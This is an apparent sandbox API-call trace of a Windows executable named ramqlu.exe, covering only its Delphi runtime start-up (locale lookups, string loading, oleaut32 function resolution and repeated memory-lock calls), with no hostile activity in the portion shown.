# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 19.04.2020 12:27:01.230 Process: id = "1" image_name = "ramqlu.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe" page_root = "0x49197000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb10 [0049.862] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0049.863] GetKeyboardType (nTypeFlag=0) returned 4 [0049.864] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0049.864] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0049.864] GetACP () returned 0x4e4 [0049.864] GetCurrentThreadId () returned 0xb10 [0049.864] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0049.878] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0049.878] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.879] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.879] lstrcpynA (in: lpString1=0x18ecc3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" [0049.879] GetThreadLocale () returned 0x409 [0049.879] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0049.880] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned 48 [0049.881] lstrcpynA (in: lpString1=0x18ecf0, lpString2="ENU", iMaxLength=216 | out: lpString1="ENU") returned="ENU" [0049.881] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0049.881] lstrcpynA (in: lpString1=0x18ecf0, lpString2="EN", iMaxLength=216 | out: lpString1="EN") returned="EN" [0049.881] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.883] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.883] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.883] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0049.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0049.883] GetThreadLocale () returned 0x409 [0049.883] GetSystemMetrics (nIndex=42) returned 0 [0051.790] GetThreadLocale () returned 0x409 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jan") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mar") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sep") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thu") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0051.791] GetThreadLocale () returned 0x409 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0051.792] GetThreadLocale () returned 0x409 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0051.792] GetThreadLocale () returned 0x409 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0051.792] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=17214726634) returned 1 [0051.793] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0051.796] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0051.796] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0051.797] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.797] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.797] GlobalUnlock (hMem=0x270004) returned 0 [0051.798] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.798] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.798] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.798] GlobalUnlock (hMem=0x270004) returned 0 [0051.798] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.798] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.799] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.799] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.799] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.799] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.799] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.800] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.801] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.802] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.802] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.802] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.803] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.803] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.803] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.803] GlobalUnlock (hMem=0x27000c) returned 0 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.803] GlobalUnlock (hMem=0x27000c) returned 0 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.803] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.803] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalReAlloc (hMem=0x270004, dwBytes=0x10, uFlags=0x2) returned 0x270004 [0051.804] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.804] GlobalUnlock (hMem=0x27000c) returned 0 [0051.804] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.804] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.804] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.805] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.806] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 